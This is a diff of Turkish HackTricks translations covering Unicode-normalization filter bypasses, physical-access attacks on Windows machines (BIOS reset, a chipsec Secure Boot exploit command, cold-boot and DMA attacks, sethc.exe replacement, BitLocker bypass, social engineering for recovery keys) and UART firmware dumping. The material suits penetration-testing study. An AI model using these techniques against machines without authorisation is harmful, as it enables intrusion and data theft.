Web uygulamasını kandırarak ve XSS'yi sömürmek için aşağıdaki karakterlerden birini kullanabilirsiniz:
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (312) (2).png>)
@ -101,9 +115,9 @@ Web uygulamasını kandırmak ve XSS açığını sömürmek için aşağıdaki
### Regex Fuzzing
Arka uç, **kullanıcı girişini bir regex ile kontrol ederken**, **girişin regex için normalize edildiği** ancak **kullanıldığı yer için normalize edilmediği** olabilir. Örneğin, birık Yönlendirme veya SSRF'de regex, gönderilen URL'yi **normalize edebilir** ancak **olduğu gibi erişebilir**.
Arka uç, **kullanıcı girdisini bir regex ile kontrol ederken**, **girdinin** regex için **normalize edildiği** ancak **kullanıldığı yerde değil** olabileceği durumlarla karşılaşılabilir. Örneğin,ık Yönlendirme veya SSRF'de regex, gönderilen URL'yi **normalize edebilir** ancak daha sonra **olduğu gibi erişebilir**.
[**recollapse**](https://github.com/0xacb/recollapse) aracı, arka ucu fuzzlemek için girişin varyasyonlarını oluşturmayı sağlar. Daha fazla bilgi için **github** ve bu [**gönderiye**](https://0xacb.com/2022/11/21/recollapse) bakın.
[**recollapse**](https://github.com/0xacb/recollapse) aracı, arka ucu test etmek için girdinin çeşitli varyasyonlarını oluşturmanıza olanak tanır. Daha fazla bilgi için **github** ve bu [**gönderiye**](https://0xacb.com/2022/11/21/recollapse) bakın.
## Referanslar
@ -111,16 +125,28 @@ Arka uç, **kullanıcı girişini bir regex ile kontrol ederken**, **girişin re
* [**https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work**](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work)
* [**https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için ücretsiz işlevsellikler sunan **karanlık ağ** destekli bir arama motorudur.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Sıfırdan başlayarak AWS hacklemeyi</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile öğrenin!</strong></summary>
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
HackTricks'i desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)'da takip edin.
* **Hacking püf noktalarınızı paylaşarak** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek katkıda bulunun.
* **Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
* [**The PEASS Family'yi keşfedin**](https://opensea.io/collection/the-peass-family), özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu keşfedin
* **💬 Discord grubuna** **katılın**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**'ı takip edin**.
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>

View file

@ -2,66 +2,80 @@
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşün</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile öğrenin!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek** veya HackTricks'i **PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz olan [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'u **takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR gönderin.
</details>
## BIOS Parola Kurtarma ve Sistem Güvenliği
## WhiteIntel
**BIOS'un sıfırlanması**, birkaç farklı şekilde gerçekleştirilebilir. Çoğu anakart, BIOS ayarlarını, parolayı da dahil olmak üzere, sıfırlayacak olan bir **pil** içerir. Pil, yaklaşık **30 dakika** çıkarıldığında BIOS ayarlarını sıfırlar. Alternatif olarak, anakart üzerindeki bir **jumper**, belirli pinleri birleştirerek bu ayarları sıfırlamak için ayarlanabilir.
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
Donanım ayarlamalarının mümkün veya pratik olmadığı durumlarda, **yazılım araçları** bir çözüm sunar. **Kali Linux** gibi dağıtımlarla bir **Canlı CD/USB** üzerinden sistem çalıştırarak, BIOS parola kurtarmada yardımcı olabilecek **_killCmos_** ve **_CmosPWD_** gibi araçlara erişim sağlanabilir.
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan **dark-web** destekli bir arama motorudur.
BIOS parolasının bilinmediği durumlarda, yanlış girilmesi durumunda genellikle bir hata kodu ortaya çıkar. Bu kod, [https://bios-pw.org](https://bios-pw.org) gibi web sitelerinde kullanılarak kullanılabilir bir parola elde edilebilir.
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
## BIOS Şifresi Kurtarma ve Sistem Güvenliği
**BIOS'un sıfırlanması** birkaç farklı şekilde gerçekleştirilebilir. Çoğu anakartın içinde, BIOS ayarlarını, şifreyi de dahil olmak üzere sıfırlayacak olan bir **pil** bulunmaktadır ve bu pil yaklaşık **30 dakika** çıkarıldığında BIOS ayarları sıfırlanır. Alternatif olarak, anakart üzerindeki bir **jumper** belirli pinleri birleştirerek bu ayarları sıfırlamak için ayarlanabilir.
Donanım ayarlarının mümkün veya pratik olmadığı durumlarda, **yazılım araçları** bir çözüm sunar. **Kali Linux** gibi dağıtımlarla bir sistem **Canlı CD/USB** üzerinden çalıştırılarak **_killCmos_** ve **_CmosPWD_** gibi araçlara erişim sağlanabilir ve BIOS şifresi kurtarmada yardımcı olabilir.
BIOS şifresi bilinmediğinde, yanlış girilmesi durumunda genellikle bir hata kodu alınır. Bu kod, [https://bios-pw.org](https://bios-pw.org) gibi web sitelerinde kullanılarak kullanılabilir bir şifre alınabilir.
### UEFI Güvenliği
Geleneksel BIOS yerine **UEFI** kullanan modern sistemler için, **chipsec** aracı, UEFI ayarlarını analiz etmek ve değiştirmek için kullanılabilir. Bu, aşağıdaki komutla gerçekleştirilebilir:
Geleneksel BIOS yerine **UEFI** kullanan modern sistemler için, **chipsec** aracı, **Secure Boot**'u devre dışı bırakma dahil olmak üzere UEFI ayarlarını analiz etmek ve değiştirmek için kullanılabilir. Bu, aşağıdaki komutla gerçekleştirilebilir:
`python chipsec_main.py -module exploits.secure.boot.pk`
### RAM Analizi ve Soğuk Başlatma Saldırıları
RAM, güç kesildikten sonra verileri kısa bir süre tutar, genellikle **1 ila 2 dakika** boyunca. Bu süre, sıvı nitrojen gibi soğuk maddeler uygulanarak **10 dakikaya** kadar uzatılabilir. Bu uzatılmış süre boyunca, **dd.exe** ve **volatility** gibi araçlar kullanılarak bir **bellek dökümü** oluşturulabilir ve analiz edilebilir.
RAM, güç kesildikten sonra genellikle **1 ila 2 dakika** boyunca verileri korur. Bu süre, sıvı nitrojen gibi soğutucu maddeler uygulanarak **10 dakikaya** kadar uzatılabilir. Bu uzatılmış süre zarfında, **dd.exe** ve **volatility** gibi araçlar kullanılarak bir **bellek dökümü** oluşturulabilir ve analiz edilebilir.
### Doğrudan Bellek Erişimi (DMA) Saldırıları
**INCEPTION**, DMA aracılığıyla fiziksel bellek manipülasyonu için tasarlanmış bir araçtır ve **FireWire** ve **Thunderbolt** gibi arabirimlerle uyumludur. Bu araç, belleği herhangi bir parolayı kabul edecek şekilde yamalayarak giriş prosedürlerini atlamayı sağlar. Ancak, **Windows 10** sistemlere karşı etkisizdir.
**INCEPTION**, DMA aracılığıyla fiziksel bellek manipülasyonu için tasarlanmış bir araçtır ve **FireWire** ve **Thunderbolt** gibi arabirimlerle uyumludur. Bu araç, belleği herhangi bir şifreyi kabul edecek şekilde yamalayarak giriş prosedürlerini atlamayı sağlar. Ancak, **Windows 10** sistemlerine karşı etkisizdir.
### Sistem Erişimi İçin Canlı CD/USB
**_sethc.exe_** veya **_Utilman.exe_** gibi sistem ikili dosyalarını **_cmd.exe_** bir kopyasıyla değiştirmek, sistem ayrıcalıklarıyla bir komut istemi sağlayabilir. **chntpw** gibi araçlar, bir Windows kurulumunun **SAM** dosyasını düzenlemek için kullanılabilir ve parola değişikliklerine izin verir.
**_sethc.exe_** veya **_Utilman.exe_** gibi sistem ikili dosyalarını **_cmd.exe_** kopyasıyla değiştirerek sistem ayrıcalıklarıyla bir komut istemini sağlayabilirsiniz. **chntpw** gibi araçlar, Windows kurulumunun **SAM** dosyasını düzenlemek için kullanılabilir, böylece şifre değişiklikleri yapılabilir.
**Kon-Boot**, Windows sistemlere mevcut parolayı bilmeden giriş yapmayı kolaylaştıran bir araçtır. Daha fazla bilgi için [https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/) adresine bakabilirsiniz.
**Kon-Boot**, Windows sistemlerine şifreyi bilmeden geçici olarak Windows çekirdeğini veya UEFI'yi değiştirerek oturum açmayı kolaylaştıran bir araçtır. Daha fazla bilgiye [https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/) adresinden ulaşılabilir.
### Windows Güvenlik Özelliklerinin İşlenmesi
#### Başlatma ve Kurtarma Kısayolları
#### Başlangıç ve Kurtarma Kısayolları
- **Supr**: BIOS ayarlarına erişim.
- **F8**: Kurtarma moduna gir.
- Windows logosu sonrasında **Shift** tuşuna basarak otomatik oturum açmayı atlayabilirsiniz.
- **F8**: Kurtarma moduna girme.
- Windows bannerından sonra **Shift** tuşuna basarak otomatik oturumu atlayabilirsiniz.
#### Kötü USB Aygıtları
#### KÖTÜ USB Cihazları
**Rubber Ducky** ve **Teensyduino** gibi aygıtlar, hedef bir bilgisayara bağlandığında önceden tanımlanmış yükleri yürütebilen **kötü USB** aygıtları oluşturmak için platform olarak kullanılır.
**Rubber Ducky** ve **Teensyduino** gibi cihazlar, hedef bilgisayara bağlandığında önceden tanımlanmış yükleri yürütebilen **kötü USB** cihazları oluşturmak için platformlar olarak hizmet eder.
#### Volume Shadow Copy
#### Hacim Gölge Kopyası
Yönetici ayrıcalıkları, PowerShell aracılığıyla **SAM** dosyası dahil hassas dosyaların kopyalarının oluşturulmasına izin verir.
### BitLocker Şifresini Atlatma
### BitLocker Şifrelemesini Atlatma
BitLocker şifrelemesi, bir bellek döküm dosyası (**MEMORY.DMP**) içinde **kurtarma şifresi** bulunursa atlatılabilir. Bu amaçla, **Elcomsoft Forensic Disk Decryptor** veya **Passware Kit Forensic** gibi araçlar kullanılabilir.
BitLocker şifrelemesi, **hafıza dökümü dosyası (MEMORY.DMP)** içinde **kurtarma şifresi** bulunursa atlatılabilir. Bu amaçla **Elcomsoft Forensic Disk Decryptor** veya **Passware Kit Forensic** gibi araçlar kullanılabilir.
### Kurtarma Anahtarı Eklemek İçin Sosyal Mühendislik
Sosyal mühendislik taktikleriyle yeni bir BitLocker kurtarma anahtarı eklemek mümkündür. Bir kullanıcıyı, şifreleme sürecini basitleştirmek için sıfırlardan oluşan yeni bir kurtarma anahtarı ekleyen bir komutu çalıştırmaya ikna etmek bu işlemi sağlar.
Yeni bir BitLocker kurtarma anahtarı, bir kullanıcıyı sıfırlama işlemi yapacak bir komutu çalıştırmaya ikna ederek sosyal mühendislik taktikleriyle eklenir ve bu da şifreleme işlemini basitleştirir.

View file

@ -7,20 +7,34 @@
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na(https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* [**Resmi PEASS & HackTricks ürünleri**](https://peass.creator-spring.com)'ni edinin
* [**PEASS Ailesi**](https://opensea.io/collection/the-peass-family)'ni keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)'da **takip edin**.
* **Hacking püf noktalarınızı göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına PR göndererek paylaşın.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) **dark-web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
{% embed url="https://whiteintel.io" %}
---
## Temel Bilgiler
UART, verileri bir bitlik birimler halinde bileşenler arasında ileten bir seri protokoldür. Buna karşılık, paralel iletişim protokolleri verileri aynı anda birden fazla kanaldan iletilir. Yaygın seri protokoller arasında RS-232, I2C, SPI, CAN, Ethernet, HDMI, PCI Express ve USB bulunur.
UART, verilerin bileşenler arasında bir bit aynı anda aktarıldığı bir seri protokoldür. Buna karşılık, paralel iletişim protokolleri verileri aynı anda birden fazla kanaldan iletilir. Yaygın seri protokoller arasında RS-232, I2C, SPI, CAN, Ethernet, HDMI, PCI Express ve USB bulunur.
Genel olarak, UART boşta iken (mantıksal 1 değerinde) hat yüksek tutulur. Daha sonra, veri transferinin başlangıcını belirtmek için verici, alıcıya bir başlangıç biti gönderir, bu sırada sinyal düşük tutulur (mantıksal 0 değerinde). Daha sonra, verici gerçek mesajı içeren beş ila sekiz veri biti gönderir, bunu isteğe bağlı bir çiftlik biti ve yapılandırmaya bağlı olarak bir veya iki durdurma biti (mantıksal 1 değerinde) izler. Hata denetimi için kullanılan çiftlik biti, uygulamada nadiren görülür. Durdurma biti (veya bitleri) iletimin sonunu belirtir.
Genel olarak, UART boşta iken hat yüksek seviyede tutulur (mantıksal 1 değerinde). Daha sonra, veri transferinin başlangıcını belirtmek için verici, alıcıya bir başlangıç biti gönderir, bu sırada sinyal düşük seviyede tutulur (mantıksal 0 değerinde). Daha sonra, verici, gerçek mesajı içeren beş ila sekiz veri biti gönderir, ardından isteğe bağlı bir çiftlik biti ve yapılandırmaya bağlı olarak bir veya iki durdurma biti (mantıksal 1 değerinde) gönderir. Hata denetimi için kullanılan çiftlik biti, uygulamada nadiren görülür. Durdurma biti (veya bitleri) iletimin sonunu belirtir.
En yaygın yapılandırmaya 8N1 adını veririz: sekiz veri biti, çiftlik biti olmadan ve bir durdurma biti. Örneğin, 8N1 UART yapılandırmasında karakter C'yi veya ASCII'de 0x43'ü göndermek isteseydik, aşağıdaki bitleri gönderirdik: 0 (başlangıç biti); 0, 1, 0, 0, 0, 0, 1, 1 (0x43'ün ikili değeri) ve 0 (durdurma biti).
En yaygın yapılandırmayı 8N1 olarak adlandırıyoruz: sekiz veri biti, çiftlik yok ve bir durdurma biti. Örneğin, 8N1 UART yapılandırmasında karakter C'yi veya ASCII'de 0x43'ü göndermek isteseydik, aşağıdaki bitleri gönderirdik: 0 (başlangıç biti); 0, 1, 0, 0, 0, 0, 1, 1 (ikili 0x43 değeri) ve 0 (dur biti).
![](<../../.gitbook/assets/image (761).png>)
@ -28,26 +42,26 @@ UART ile iletişim kurmak için donanım araçları:
* USB-seri adaptör
* CP2102 veya PL2303 yongalarıyla adaptörler
* Bus Pirate, Adafruit FT232H, Shikra veya Attify Badge gibi çok amaçlı araçlar
* Bus Pirate, Adafruit FT232H, Shikra veya Attify Badge gibi çok amaçlı araçlar gibi
### UART Bağlantı Noktalarını Tanımlama
### UART Portlarını Tanımlama
UART'ın 4 bağlantı noktası vardır: **TX**(Gönder), **RX**(Al), **Vcc**(Gerilim) ve **GND**(Toprak). PCB'de **`TX`** ve **`RX`** harflerinin **yazılı olduğu** 4 bağlantı noktası bulabilirsiniz. Ancak işaret yoksa, bir **multimetre** veya **mantık analizörü** kullanarak kendiniz bulmanız gerekebilir.
UART'ın 4 portu vardır: **TX**(Gönder), **RX**(Al), **Vcc**(Gerilim) ve **GND**(Toprak). PCB'de **`TX`** ve **`RX`** harflerinin **yazılı olduğu** 4 port bulabilirsiniz. Ancak bir işaret yoksa, bunları bir **multimetre** veya bir **mantık analizörü** kullanarak kendiniz bulmanız gerekebilir.
Bir **multimetre** ve cihaz kapalıyken:
* **Topraklılık Testi** modunu kullanarak **GND** pimini tanımlamak için, arka ucu toprağa yerleştirin ve kırmızı ucu ile test edin, multimetreden bir ses duyana kadar. PCB'de birkaç GND pimi bulunabilir, bu nedenle UART'a ait olanı bulmuş olabilirsiniz veya olmayabilirsiniz.
* **VCC bağlantı noktasını** tanımlamak için **DC gerilim modunu** ayarlayın ve 20 V gerilime kadar ayarlayın. Siyah probu toprağa, kırmızı probu pine yerleştirin. Cihazıın. Multimetre sabit bir 3.3 V veya 5 V gerilim ölçerse, Vcc pimini bulmuşsunuz demektir. Başka gerilimler alırsanız, diğer bağlantı noktaları ile tekrar deneyin.
* **TX** **bağlantı noktasını** tanımlamak için, **DC gerilim modunu** 20 V gerilime kadar ayarlayın, siyah probu toprağa, kırmızı probu pine yerleştirin ve cihazıın. Gerilimin birkaç saniye boyunca dalgalanıp daha sonra Vcc değerinde sabitlendiğini bulursanız, muhtemelen TX bağlantı noktasını bulmuşsunuz demektir. Bu, cihazı açarken bazı hata ayıklama verileri gönderdiği içindir.
* **RX bağlantı noktası**, diğer 3'e en yakın olan olacaktır, en düşük gerilim dalgalanması ve tüm UART pinlerinin en düşük genel değerine sahiptir.
* **GND** pini tanımlamak için **Süreklilik Testi** modunu kullanın, arka ucu toprağa yerleştirin ve kırmızı ucu ile test edin, multimetreden bir ses duyana kadar. PCB'de birkaç GND pini bulunabilir, bu nedenle UART'a ait olanı bulmuş olabilirsiniz veya olmayabilirsiniz.
* **VCC portunu** tanımlamak için **DC gerilim modunu** ayarlayın ve 20 V gerilime kadar ayarlayın. Siyah probu toprağa, kırmızı probu pine yerleştirin ve cihazıın. Multimetre sabit bir 3.3 V veya 5 V gerilim ölçerse, Vcc pini bulmuşsunuz demektir. Başka gerilimler alırsanız, diğer portlarla tekrar deneyin.
* **TX** **portunu** tanımlamak için **DC gerilim modunu** 20 V gerilime kadar ayarlayın, siyah probu toprağa, kırmızı probu pine yerleştirin ve cihazıın. Gerilimin birkaç saniye boyunca dalgalanıp daha sonra Vcc değerinde sabitlendiğini bulursanız, muhtemelen TX portunu bulmuşsunuzdur. Bu, cihazı açarken bazı hata ayıklama verileri gönderdiği içindir.
* **RX portu**, diğer 3'e en yakın olanı olacaktır, en düşük gerilim dalgalanması ve tüm UART pinlerinin en düşük genel değerine sahiptir.
TX ve RX bağlantı noktalarını karıştırabilirsiniz ve hiçbir şey olmaz, ancak GND ve VCC bağlantı noktalarını karıştırırsanız devreyi yakabilirsiniz.
TX ve RX portlarını karıştırabilirsiniz ve hiçbir şey olmaz, ancak GND ve VCC portlarını karıştırırsanız devreyi yakabilirsiniz.
Bazı hedef cihazlarda, üretici tarafından RX veya TX veya hatta her ikisi devre dışı bırakılarak UART bağlantı noktası devre dışı bırakılabilir. Bu durumda, devre kartındaki bağlantıları izlemek ve bazı ayrık noktaları bulmak faydalı olabilir. UART algılamasının olmadığını ve devrenin kırıldığını doğrulamak için güçlü bir ipucu, cihazın garantisini kontrol etmektir. Cihazın garanti ile gönderilmiş olması durumunda, üretici bazı hata ayıklama arayüzleri (bu durumda UART) bırakır ve bu nedenle UART'ı bağlamış ve hata ayıklama yaparken tekrar bağlayacaktır. Bu ayrık pinler lehimleme veya jumper kabloları ile bağlanabilir.
Bazı hedef cihazlarda, üretici tarafından RX veya TX devre dışı bırakılarak UART portu devre dışı bırakılabilir veya ikisi de devre dışı bırakılabilir. Bu durumda, devre kartındaki bağlantıları izleyerek ve bazı ayrılma noktalarını bularak yardımcı olabilir. UART'nin algılanmadığını ve devrenin kırıldığını doğrulamak hakkında güçlü bir ipucu, cihazın garantisini kontrol etmektir. Cihazın bir garanti ile gönderilmiş olması durumunda, üretici bazı hata ayıklama arayüzleri (bu durumda, UART) bırakır ve bu nedenle UART'yi bağlamış ve hata ayıklama yaparken tekrar bağlayacaktır. Bu ayrılma pinleri lehimleme veya jumper tellerle bağlanabilir.
### UART Baud Oranını Tanımlama
Doğru baud oranını tanımlamanın en kolay yolu, **TX piminden çıktıyı incelemek ve veriyi okumaya çalışmaktır**. Aldığınız veri okunabilir değilse, veri okunabilir hale gelene kadar bir sonraki mümkün baud oranına geçin. Bunu yapmak için bir USB-seri adaptör veya Bus Pirate gibi çok amaçlı bir cihaz kullanabilir ve [baudrate.py](https://github.com/devttys0/baudrate/) gibi bir yardımcı betikle eşleştirebilirsiniz. En yaygın baud oranları 9600, 38400, 19200, 57600 ve 115200'dür.
Doğru baud oranını tanımlamanın en kolay yolu, **TX pini çıkışını incelemek ve veriyi okumaya çalışmaktır**. Aldığınız veri okunabilir değilse, veri okunabilir hale gelene kadar bir sonraki mümkün baud oranına geçin. Bunu yapmak için bir USB-seri adaptör veya Bus Pirate gibi çok amaçlı bir cihaz kullanabilir ve [baudrate.py](https://github.com/devttys0/baudrate/) gibi bir yardımcı betikle eşleştirebilirsiniz. En yaygın baud oranları 9600, 38400, 19200, 57600 ve 115200'dür.
{% hint style="danger" %}
Bu protokolde bir cihazın TX'sini diğer cihazın RX'ine bağlamanız gerektiğini unutmamak önemlidir!
@ -55,7 +69,7 @@ Bu protokolde bir cihazın TX'sini diğer cihazın RX'ine bağlamanız gerektiğ
## CP210X UART to TTY Adaptörü
CP210X Yongası, NodeMCU (esp8266 ile) gibi birçok prototip kartında Seri İletişim için kullanılır. Bu adaptörler oldukça ucuzdur ve hedefin UART arabirimine bağlanmak için kullanılabilir. Cihazın 5 pimi vardır: 5V, GND, RXD, TXD, 3.3V. Herhangi bir hasar olmaması için hedef tarafından desteklenen gerilimi bağladığınızdan emin olun. Son olarak, Adaptörün RXD pimini hedefin TXD'sine ve Adaptörün TXD pimini hedefin RXD'sine bağlayın.
CP210X Yongası, NodeMCU (esp8266 ile) gibi birçok prototip kartında Seri İletişim için kullanılır. Bu adaptörler oldukça ucuzdur ve hedefin UART arabirimine bağlanmak için kullanılabilir. Cihazın 5 pini vardır: 5V, GND, RXD, TXD, 3.3V. Herhangi bir hasar olmaması için hedef tarafından desteklenen gerilimi bağladığınızdan emin olun. Son olarak, Adaptörün RXD pimini hedefin TXD'sine ve Adaptörün TXD pimini hedefin RXD'sine bağlayın.
Adaptör algılanmazsa, CP210X sürücülerinin ana sistemde yüklü olduğundan emin olun. Adaptör algılandığında ve bağlandığında, picocom, minicom veya screen gibi araçlar kullanılabilir.
@ -81,7 +95,7 @@ UART Seri USB adaptörleri mevcut değilse, Arduino UNO R3 hızlı bir hile ile
Arduino UNO R3'ün kendisinde kart üzerinde bulunan bir USB'den Seri adaptörü vardır. UART bağlantısı almak için, sadece Arduino'dan Atmel 328p mikrodenetleyici yongasını çıkarın. Bu hile, Arduino UNO R3 varyantlarında (SMD versiyonunda kullanılan) kart üzerine lehimlenmemiş olan Atmel 328p'ye sahip olanlarda çalışır. Arduino'nun RX pini (Dijital Pin 0) ile UART Arayüzünün TX pini ve Arduino'nun TX pini (Dijital Pin 1) ile UART arayüzünün RX pini bağlanır.
Son olarak, UART arayüzüne göre baud hızını ayarlayarak Arduino IDE'yi kullanmanız önerilir.
Son olarak, UART arayüzüne göre baud hızını ayarlayarak Arduino IDE'yi kullanmanız önerilir. Menüdeki `tools` bölümünde, `Serial Console` seçeneğini seçin ve baud hızını ayarlayın.
## Bus Pirate
@ -159,13 +173,13 @@ waiting a few secs to repeat....
```
## UART Konsolu ile Firmware'in Dump Edilmesi
UART Konsolu, çalışma zamanı ortamındaki temel firmware ile çalışmanın harika bir yolunu sağlar. Ancak UART Konsolu erişimi salt okunur olduğunda birçok kısıtlama getirebilir. Birçok gömülü cihazda, firmware EEPROM'lerde depolanır ve geçici belleğe sahip işlemcilerde yürütülür. Dolayısıyla, firmware, üretim sırasında EEPROM içindeki orijinal firmware olduğundan ve herhangi yeni dosyalar geçici bellek nedeniyle kaybolacağından salt okunur olarak tutulur. Bu nedenle, gömülü firmware'lerle çalışırken firmware'in dump edilmesi değerli bir çabadır.
UART Konsolu, çalışma zamanı ortamındaki temel firmware ile çalışmanın harika bir yolunu sağlar. Ancak UART Konsolu erişimi salt okunur olduğunda birçok kısıtlama getirebilir. Birçok gömülü cihazda, firmware EEPROM'lerde depolanır ve geçici belleğe sahip işlemcilerde yürütülür. Dolayısıyla, firmware, üretim sırasında EEPROM içindeki orijinal firmware olduğundan ve herhangi yeni dosyalar geçici bellek nedeniyle kaybolacağından salt okunur tutulur. Bu nedenle, gömülü firmware'lerle çalışırken firmware'in dump edilmesi değerli bir çabadır.
Bunu yapmanın birçok yolu vardır ve SPI bölümü, çeşitli cihazlarla EEPROM'dan firmware'in doğrudan çıkarılma yöntemlerini kapsar. Ancak, fiziksel cihazlar ve harici etkileşimlerle firmware'in dump edilmesini ilk denemeden önce UART ile yapmayı önerilir.
